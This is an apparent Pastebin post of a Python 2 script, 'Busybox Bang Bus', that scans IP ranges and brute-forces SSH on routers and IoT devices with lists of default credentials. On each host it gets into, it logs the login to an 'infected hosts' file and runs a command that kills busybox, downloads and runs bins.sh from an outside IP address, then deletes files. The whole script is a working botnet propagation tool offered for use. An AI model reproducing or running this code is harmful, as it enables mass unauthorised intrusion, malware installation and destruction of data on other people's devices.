Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- """
- Busybox Bang Bus - Edited by Chris Poole
- Shout out to LNO LiGhT
- """
- import threading, paramiko, random, socket, time, os, sys
- os.system("clear")
- if len(sys.argv) < 3:
- print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "
- print " BuSyBoX BaNG BuS - Edited by Chirs Poole "
- print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "
- print "| Usage: python "+sys.argv[0]+" [Start IP] [End IP] [0/1/2/mirai/iot] |"
- print "| Usage: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 0 | COM Routers |"
- print "| Usage: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 1 | Routers |"
- print "| Usage: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 2 | Cisco Routers |"
- print "| Usage: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 mirai | Mirai Devices |"
- print "| Usage: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 iot | Internet of Things |"
- print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "
- sys.exit(" Example: python "+sys.argv[0]+" 119.93.0.0 119.93.254.254 1\n")
- sys.stdout.write("\x1b]2;BuSyBoX BaNG BuS\x07")
- paramiko.util.log_to_file("/dev/null") #quiets paramiko output
- passwords = [ # argv 0
- "admin:1234",
- "admin:admin",
- "root:1234",
- "root:root",
- ]
- if sys.argv[3] == '1':
- passwords = [ "root:root", "root:1234", "admin:1234", "admin:admin" ] # Routers #
- if sys.argv[3] == '2':
- passwords = [ "root:password", "admin:password" ] # Cisco Routers #
- if sys.argv[3] == 'mirai':
- passwords = [ "admin:1234", "admin:password", "admin:qwerty", "admin:0", "admin:pi", "admin:gnome", "root:1234", "root:password", "root:qwerty", "root:0", "root:pi", "root:gnome" ] # Mirai IoT #
- if sys.argv[3] == 'iot':
- passwords = [ "ubnt:ubnt", "root:perl", "root:printer", "root:zte", "root:cam", "root:edu", "root:gov", "root:camera", "root:wifi", "root:ssh", "root:levno", "admin:perl", "admin:printer", "admin:zte", "admin:cam", "admin:edu", "admin:gov", "admin:camera", "admin:wifi", "admin:ssh", "admin:levno" ] # IoT's #
- raw_input("Press <ENTER> to Enter the Bang Bus")
- credit = '''
- | - - - - - - - - - - - - - - - - - - - - - |
- | BusyBox Bang Bus - Edited has started! |
- | Edited by Chris Poole | @codingplanets |
- | - - - - - - - - - - - - - - - - - - - - - |
- | Please give BBB 5 minutes to spawn |
- | all paramiko threads. |
- | - - - - - - - - - - - - - - - - - - - - - |
- '''
- print "\033[0m" + credit + "\033[0m"
- def ipRange(start_ip, end_ip):
- start = list(map(int, start_ip.split(".")))
- end = list(map(int, end_ip.split(".")))
- temp = start
- ip_range = []
- ip_range.append(start_ip)
- while temp != end:
- start[3] += 1
- for i in (3, 2, 1):
- if temp[i] == 256:
- temp[i] = 0
- temp[i-1] += 1
- ip_range.append(".".join(map(str, temp)))
- return ip_range
- class sshscanner(threading.Thread): # TAG: 1A
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip)
- global passwords
- def run(self):
- x = 1
- while x != 0:
- try:
- username='root'
- password="0"
- port = 22
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(3)
- s.connect((self.ip, port))
- s.close()
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- dobreak=False
- for passwd in passwords:
- if ":n/a" in passwd:
- password=""
- else:
- password=passwd.split(":")[1]
- if "n/a:" in passwd:
- username=""
- else:
- username=passwd.split(":")[0]
- try:
- ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
- dobreak=True
- break
- except:
- pass
- if True == dobreak:
- break
- badserver=True
- stdin, stdout, stderr = ssh.exec_command("echo busyboxed")
- output = stdout.read()
- if "busyboxed" in output:
- badserver=False
- if badserver == False:
- os.system("echo -e " +username+ ":" +password+ ":" +self.ip+ " >> BusyBoxBangBus_Infected_Hosts.log")
- print "\033[32mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"
- ssh.exec_command("cd /; pkill -9 busybox; wget http://69.69.96.69/bins.sh; chmod 777 bins.sh; ./bins.sh; chmod 777 *; sh bins.sh; rm -fr *") # Place your payload here #
- time.sleep(3)
- ssh.close()
- if badserver == True:
- ssh.close()
- except:
- pass
- x = 0
- ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
- for ip in ip_range:
- try:
- t = sshscanner(ip)
- t.start()
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement